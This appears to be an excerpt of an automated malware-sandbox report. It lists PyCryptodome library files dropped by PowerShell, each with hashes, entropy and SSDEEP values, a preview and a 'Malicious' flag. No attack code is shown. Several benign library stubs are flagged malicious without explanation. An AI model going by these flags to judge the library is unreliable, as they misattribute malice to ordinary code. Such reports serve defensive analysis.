                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):764
                                                                                                                                                                                                                              Entropy (8bit):4.362163899247177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
                                                                                                                                                                                                                              MD5:0A2310BA7677F27E22A421132A86D382
                                                                                                                                                                                                                              SHA1:A976C8749DEE4E295DD8C808E2A7A47922E86BB4
                                                                                                                                                                                                                              SHA-256:3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
                                                                                                                                                                                                                              SHA-512:6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7137
                                                                                                                                                                                                                              Entropy (8bit):5.119608310082165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:8qrskrs9t3q/IN27FJtmlrwdE0VpAZIBHx4fCbKXP:rrskrs9VqXUaHUZ2Rzb8
                                                                                                                                                                                                                              MD5:D47C57763FDA9057BE5F653CFFC76BD0
                                                                                                                                                                                                                              SHA1:3D758758AC5F98B04F317232FFD18D95CD62489C
                                                                                                                                                                                                                              SHA-256:B56FB5F5C5DB07C98967FD4CE110F55A970B8BBF4E69A1EE8072F09CB8C80484
                                                                                                                                                                                                                              SHA-512:8FC4559A0D9D3E63E11E63F2B5519BFF0F7BBF6F05057E2A6D0EF03F89EA7A3DE0E77D9E0DEB7677167A1454C97FF3C25BAAC3BE1F70DDB099E9F0C70C48D6E5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#..# Util/PEM.py : Privacy Enhanced Mail utilities..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):313
                                                                                                                                                                                                                              Entropy (8bit):4.63314311726341
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYBbAmV4uDbIBFeLBysOZ4fJEBd1pHWERrBFeLsEiJos:1REYBbr+uWFeLB/OifJEjv2EDFeLsEi5
                                                                                                                                                                                                                              MD5:107D6CC5B80CF3E12D074590F5D47AE5
                                                                                                                                                                                                                              SHA1:E89B8FCF239CD49A0CFC3D7561C783EA63E2FD19
                                                                                                                                                                                                                              SHA-256:FD17DE9B1D9EEB3950223BE5E5B16A8CA3EE0A7E4822557F0B882BFF3D67A1D0
                                                                                                                                                                                                                              SHA-512:B6E46F3846AFB5E59C5C6C1454FEEEC7FDAA01665F811BFE5338035A5D34CE16347F58EE9921118BEE11D73DE9A5CC56B2B5CC5257EF406D90E495DE3F0C0435
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Tuple, Optional, Callable....def encode(data: bytes,.. marke: str,... passphrase: Optional[bytes] = ...,... randfunc: Optional[Callable[[int],bytes]] = ...) -> str: .........def decode(pem_data: str,.. passphrase: Optional[bytes] = ...) -> Tuple[bytes, str, bool]: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8025
                                                                                                                                                                                                                              Entropy (8bit):4.947237016391909
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/qrskrs9t3q/IXr6R3zH3ccW484YH/Y/bNoWN0+N:Srskrs9VqMry3rchXNQN56W
                                                                                                                                                                                                                              MD5:4ABCB64200E9782AFBB602C441B8FED2
                                                                                                                                                                                                                              SHA1:1697F19B9C8F5889DC8AFE00738026E1A0CAE2E8
                                                                                                                                                                                                                              SHA-256:9A1284B3DC17D008C7C88215C48F06370490883AFE1353838323FE519822FF6C
                                                                                                                                                                                                                              SHA-512:2BFB0D3709701A20380204293DD827101CF67F3D623D816B044FFD98ACED07E4EB6C08D5CD655353660929B238F01E7D546F687313B266611C8F5B638D55B829
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#..# PublicKey/PKCS8.py : PKCS#8 functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):617
                                                                                                                                                                                                                              Entropy (8bit):4.780296247881002
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBbr0mRE1BWS+EUe+LvjJMmxKxoIiNLojqyW38RJifJEvP5peYmrEidkLvFye:1REAYmC1X+u+/JMme4Loey1RMEnzurA/
                                                                                                                                                                                                                              MD5:F1EBC42749EE63F11F55A1DD77B38380
                                                                                                                                                                                                                              SHA1:9B592373655652EA3D08B222C68D62BED560C5E4
                                                                                                                                                                                                                              SHA-256:17C9A6398CEC2B74DF62786B9A84553ECFE8660DBFBEEC47663BBEF0EBD8E167
                                                                                                                                                                                                                              SHA-512:AB23620DF998CBB2519A67A272E12CA92C48167B1945DFE666C7E427BC3B9E3B6555130D04EF54A31639149A528A6F080B3220D28309E6E7D001274BB10C4A51
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Tuple, Optional, Union, Callable..from typing_extensions import NotRequired....from Crypto.Util.asn1 import DerObject..from Crypto.IO._PBES import ProtParams......def wrap(private_key: bytes,.. key_oid: str,.. passphrase: Union[bytes, str] = ...,.. protection: str = ...,.. prot_params: Optional[ProtParams] = ...,.. key_params: Optional[DerObject] = ...,.. randfunc: Optional[Callable[[int], str]] = ...) -> bytes: .........def unwrap(p8_private_key: bytes, passphrase: Optional[Union[bytes, str]] = ...) -> Tuple[str, bytes, Optional[bytes]]: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20477
                                                                                                                                                                                                                              Entropy (8bit):4.819602824795371
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:erskrs9VqYW+hS4ukVA1j6YBjBwB1vkcv8v54e9+vPzMN3DeY3H4VTZtw0AFtfzB:er6qYW+hTukVUDFm/8c0LeLMN3DeY3H7
                                                                                                                                                                                                                              MD5:02F77303FA09D2C06FD44036432DF876
                                                                                                                                                                                                                              SHA1:139E0DA6C67BC3CD75E000405E7BF92771F452C0
                                                                                                                                                                                                                              SHA-256:0F8CC06CA73276E22EA5AE445D936F6B2509B525D018FD4D7A3F5B12D2F70DC2
                                                                                                                                                                                                                              SHA-512:34379525C843BCC64E401B62CD8F295A8A29BED7CD2FD4C13B2EE550E6FCF586F244A5CC1D77990F08A08A07666B8A39231F1258F0AE2BAEDBFD63E7B695F732
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#..# PublicKey/_PBES.py : Password-Based Encryption functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):781
                                                                                                                                                                                                                              Entropy (8bit):4.711755021635503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBrqRE1BWIWK+li56EotVepVnKqYjqytJifJEjP51K+lEhB5q:1REBC1WK+cH+mnKLeytMErDK+KQ
                                                                                                                                                                                                                              MD5:104D32B3D75141B0546625AC5336C1EC
                                                                                                                                                                                                                              SHA1:BDF345B0EBE5DC7E238D79FBD5FD63362C561195
                                                                                                                                                                                                                              SHA-256:816463C1012174C626FDF286098D851BF55E201879FE9DEEADF777FD1CEA0794
                                                                                                                                                                                                                              SHA-512:70AA3BEDD20562702462F69EF3209DF71C1CBDA73BDDDA451E7A2B490095AA1FEDEA4D7093BB8DB955148396A7F28BA9E7D8AC0B1B4644E4F252DED8A780A633
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Optional, Callable, TypedDict..from typing_extensions import NotRequired....class PbesError(ValueError):.. .......class PBES1(object):.. @staticmethod.. def decrypt(data: bytes, passphrase: bytes) -> bytes: .......class ProtParams(TypedDict):.. iteration_count: NotRequired[int].. salt_size: NotRequired[int].. block_size: NotRequired[int].. parallelization: NotRequired[int]....class PBES2(object):.. @staticmethod.. def encrypt(data: bytes,.. passphrase: bytes,.. protection: str,.. prot_params: Optional[ProtParams] = ...,.. randfunc: Optional[Callable[[int],bytes]] = ...) -> bytes: ....... @staticmethod.. def decrypt(data:bytes, passphrase: bytes) -> bytes: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1571
                                                                                                                                                                                                                              Entropy (8bit):5.20334357876001
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHu:MwDqrYJALrYJHdt3EHGuIO
                                                                                                                                                                                                                              MD5:2EB5A616573613C3856A549BD00DE6D4
                                                                                                                                                                                                                              SHA1:D5DEA35B8153B724AF5C1974FE8E65716F917C42
                                                                                                                                                                                                                              SHA-256:655DBE52F138022CCDAEF6DB28569EBA1D513617D12AD88685D793E40C21F5FA
                                                                                                                                                                                                                              SHA-512:6615DD25F7CFB1F058CA7DED52E5126F5DB983B7EABA10D8F403113D21D942EA4A241A81A2451AD2FD78048F5303D94AA16AFC2DA60348A75609CD1567E0223E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6918
                                                                                                                                                                                                                              Entropy (8bit):5.540939928476962
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:m5/amw4lx6mU4qjX6syf7O8I4m92aqpyYzOq3cw:mxhw2126sOO83m921pyM1H
                                                                                                                                                                                                                              MD5:5BA184514F66EC5E7EEDD1070690A78B
                                                                                                                                                                                                                              SHA1:0F17E2787E5E598403E9191A4506132C0BEDA55F
                                                                                                                                                                                                                              SHA-256:66AFA2F3737EB22BD59F39FD643B5516AFC5FA41E59369BF88CD64B05FAFFAF8
                                                                                                                                                                                                                              SHA-512:32D6117D6DE097A4FC48CC9A88CB544DAE594FD50CF9F2ED019A424BC9342B2B8FC77BA194CA98670B5C1020ADFEA2182D50AAC5B6EF39021B8E4B92C9D97A27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf...............................d.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d...Z.d...Z.d.d...Z.y.)...encode..decode.....N)...a2b_base64..b2a_base64..hexlify..unhexlify)...MD5)...pad..unpad)...DES..DES3..AES)...PBKDF1)...get_random_bytes)...tobytes..tostrc.....................D.....|...t.........}.d.|.z...}.|.r...|.d.........}.t.........|.|.d.d.t.................}.|.t.........|.|.z...|.d.d.t.................z...}.t.........j...................|.t.........j...................|.........}.|.d.t.........t.........|.........j...................................z...z...}.|.j...................t.........|.|.j...................................}.n.|...t.........d...........t.........d.t.........|.........d.........D...c.g.c.]...}.t.........t.........|.|.|.d.z...........................}.}.|.d.j!..................|.........z...}.|.d.|.z...z...}.|.S.c...c.}.w.).a4...Encode a piece of binary data into
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5566
                                                                                                                                                                                                                              Entropy (8bit):5.737477050522581
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:XvFkHsPChdLzo8yLrjBxBcT7xK6C/+34omxeZxZsiER:XvF2SuSHjbO7moYezk
                                                                                                                                                                                                                              MD5:2E1CB289D97280DF1BBE25692F910776
                                                                                                                                                                                                                              SHA1:9A2D386430C4B92772BC3B3BA22846F2D6FA6FA7
                                                                                                                                                                                                                              SHA-256:0B1E3627EB9811F32B22C5989E24B9EE77EFAD72DFCAE449D8FB89ED137ED3F5
                                                                                                                                                                                                                              SHA-512:6397C07E5B6A18DC661494699B10B2A2DEADA9A68CEE0D77D666A26BC51D907712654056A16CAA49FCD9849A28F48504E97BA8D5587E03F523D083CFE9220285
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.VfY.........................f.....d.d.l.....d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.g.Z.d.d.d...e.........d.f.d...Z.d.d...Z.y.)......)...*)...DerNull..DerSequence..DerObjectId..DerOctetString)...PBES1..PBES2..PbesError..wrap..unwrapNc...........................|...t.........t.........|.........g.........}.n.t.........t.........|.........|.g.........}.t.........d.|.t.........|.........g.........}.|.j...........................}.|...|.S.|.s.t.........d...........t.........|.........}.|...d.}.t.........j...................|.|.|.|.|.........S.).a2...Wrap a private key into a PKCS#8 blob (clear or encrypted)... Args:.. private_key (bytes):. The private key encoded in binary form. The actual encoding is. algorithm specific. In most cases, it is DER... key_oid (string):. The object identifier (OID) of the private key to wrap.. It is a dotted string, like ``'1.2.840.113549.1.1.1'`` (for RSA keys). or ``'1.2.840.10045.2.1'`` (for
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16742
                                                                                                                                                                                                                              Entropy (8bit):5.584244065057955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:77ttdZ4UFbhTTiCWMEiZJ4rl7Z5kFftj+imYQCGvPSAGcO7VWphhh6R6R6C7GHl:vn4UJdWBMEikxl5kFtBGX9+VZggCKF
                                                                                                                                                                                                                              MD5:B33B7072283F46E1CA249F27F59B8BCC
                                                                                                                                                                                                                              SHA1:E0E35CF189F7408FBB7CAFB324F15EB934FC192D
                                                                                                                                                                                                                              SHA-256:631C89BF0915C57DB0FAC472A839C7A3F08AF523C01A83B362DFF065BC80E5C7
                                                                                                                                                                                                                              SHA-512:34BD62E468A4C75751A726501F300E722676DB89AAD32978AEC44D02B3A0CED732512F46D8FF32CAAA23C2AD1149177EB3AA110A7604AE04FF54825BA75DF8B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.O..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z ..G.d...d.e!........Z"..G.d...d.e#........Z$..G.d...d.e#........Z%y.)......N)...Hash)...Random)...DerSequence..DerOctetString..DerObjectId..DerInteger)...AES)...pad..unpad)...PBKDF1..PBKDF2..scryptz.1.2.840.113549.1.5.3z.1.2.840.113549.1.5.6z.1.2.840.113549.1.5.10z.1.2.840.113549.1.5.11z.1.2.840.113549.1.5.13z.1.2.840.113549.1.5.12z.1.3.6.1.4.1.11591.4.11z.1.2.840.113549.2.7z.1.2.840.113549.3.7z.2.16.840.1.101.3.4.1.2z.2.16.840.1.101.3.4.1.22z.2.16.840.1.101.3.4.1.42z.2.16.840.1.101.3.4.1.6z.2.16.840.1.101.3.4.1.26z.2.16.840.1.101.3.4.1.46c...........................e.Z.d.Z.y.)...PbesErrorN)...__name__..__module__..__qualname__........@C:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/IO/_PBES.pyr....r....C...s.........r....r....c..................... .....e.Z.d.Z.d.Z.e.d.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):5.196865407301491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:jj/0RmOgSW+nPw52KNdArMHmQ6Iaft0tx:fOgN+n3KNBHVjal2
                                                                                                                                                                                                                              MD5:E25FE271A567E6BD4873478CD8B23C13
                                                                                                                                                                                                                              SHA1:736394D9FED6569C4EFE27BEB654E63B4ACB87D7
                                                                                                                                                                                                                              SHA-256:D7C5C8E57BEFD1D44E000D8431948F6E5157D9634ADF2CEBB746BCDC237E1F65
                                                                                                                                                                                                                              SHA-512:540D2462B65FBC4260132EE315C2EDAD20ECAF6AD96A1D4DCDF2B3969B85D074A13F81722C69D787D066549B926B630F0C35AD6503D18D4CE5F7AAF0C79F6998
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf#...............................d.d.g.Z.y.)...PEM..PKCS8N)...__all__........CC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/IO/__init__.py..<module>r........s..........>....'.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2064
                                                                                                                                                                                                                              Entropy (8bit):5.21416007952233
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHPhZhZihFh/hwQ:MwDqrYJALrYJHdt3EHGuIZQ
                                                                                                                                                                                                                              MD5:2140FE90B368758DCFC5C2D67ED6E518
                                                                                                                                                                                                                              SHA1:73E682D147BE20F6467047BB68D55BB4F8621E85
                                                                                                                                                                                                                              SHA-256:61E83C2B11C78BF744D2DAE173F7C76C55A30F130EBEA58BF7B07402E35911B9
                                                                                                                                                                                                                              SHA-512:ADA52F2DE9B24E11F108FDF3B950ECF141DCC9D2E71D69BD6754E16286348C8322A3C78656FD6D3DC9161D11821272D64CA549B6038593D8725F3837A5A69137
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):84
                                                                                                                                                                                                                              Entropy (8bit):4.429188967239666
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1mMkoERZ6sLmL3VosL1ydxFo+CsaCAX7y:1+ZRZHL+fW4CAe
                                                                                                                                                                                                                              MD5:FC8E19CDD7D4DF22C857035B5460E98F
                                                                                                                                                                                                                              SHA1:FB9CD60C695F8D19ECF44531A14EB9245E764F37
                                                                                                                                                                                                                              SHA-256:37E4E3AA463400EF4A3F01217B46A3237D2FDA2795C78F936CC936AAB1875701
                                                                                                                                                                                                                              SHA-512:314603B6BB03875A9B59F8A76BF32DABD71E52DC30D44C48C6C975746416227EF05144888620D3984712B78CBE899CE8DCEA4ED34C4883015562A7E217F98571
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from Crypto.Math._IntegerBase import IntegerBase as Integer..__all__ = ['Integer']..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11740
                                                                                                                                                                                                                              Entropy (8bit):4.884742143024647
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IxIODJdMKQklQGODJdQ3Tegyi8OITS9/FJQmZErBGLmhKwFEpECy:0rskrs9Vq6n3frHjmoLCL
                                                                                                                                                                                                                              MD5:AE61D84D5BE5CB0CB862A6866FDB9BE4
                                                                                                                                                                                                                              SHA1:EB6C1A5C08C6BC73C452FAE4D3D4E8A17FD65649
                                                                                                                                                                                                                              SHA-256:038B088D41F46E28054BDAA8B87C02CF000373236262DDC9339EA04B00C792D2
                                                                                                                                                                                                                              SHA-512:403B5FC86A2773C23A760E57B32C37526EDC54BDD66B9E8C6DB0508B0C915936F832FB234F7D32664E8B74CE33F572E8D4F03AE0A1E7AA03E389FC9244FF69D6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):841
                                                                                                                                                                                                                              Entropy (8bit):4.5810465816498
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REqa50Kg2G2+kEgR8WSgEgRnxDNaVSYnblDNaj:wCKzG2+NgVSBgZxDQVrRDQj
                                                                                                                                                                                                                              MD5:A3ADEC74F909A4E9CFB74C5EFFD5162D
                                                                                                                                                                                                                              SHA1:4325C3C9FD0FDA73843197C2B99E55C5DCACDFE4
                                                                                                                                                                                                                              SHA-256:F73DAEA86E4577FDE3B6E314A1DA38441A8F0CA8AC64A018821E10706B80C903
                                                                                                                                                                                                                              SHA-512:F0A41213290CA4D46C1A012D8FBF38B3E16D05D61BF815634EC587B03644F707D5726BFB264AE504BFB4A070210A2CCE1898B25A0697504C6B557D06BF7B2894
                                                                                                                                                                                                                              Malicious:true
